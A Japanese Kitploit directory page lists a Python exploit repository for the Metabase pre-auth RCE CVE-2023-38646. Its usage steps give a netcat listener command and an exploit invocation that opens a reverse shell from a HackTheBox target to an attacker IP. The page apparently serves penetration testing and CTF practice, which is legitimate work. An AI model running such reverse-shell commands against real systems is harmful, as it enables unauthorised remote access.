Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — Metabaseの事前認証RCE(CVE-2023-38646)のPythonエクスプロイト。認可されたセキュリティテスト用にリバースシェルを確立します。 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2023-38646
エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubasepsaepdin/cve-2023-38646

CVE-2023-38646

Metabaseの事前認証RCE(CVE-2023-38646)のPythonエクスプロイト。認可されたセキュリティテスト用にリバースシェルを確立します。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38646 - Metabase 事前認証RCE


⚠️ 教育目的および許可されたセキュリティ調査目的に限ります

オリジナルのエクスプロイト作者

オリジナルのPoC作成者 securezeron に深く感謝します

手順ガイド

  1. 攻撃マシン上でリスナーをセットアップします:

    root@kitploit:~
    nc -nlvp 4444
    
  2. 次に、以下のコマンドを実行します:

    root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    

    image

クレジット

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
  • https://www.youtube.com/watch?v=br7JZzcTDG0
ツールをダウンロード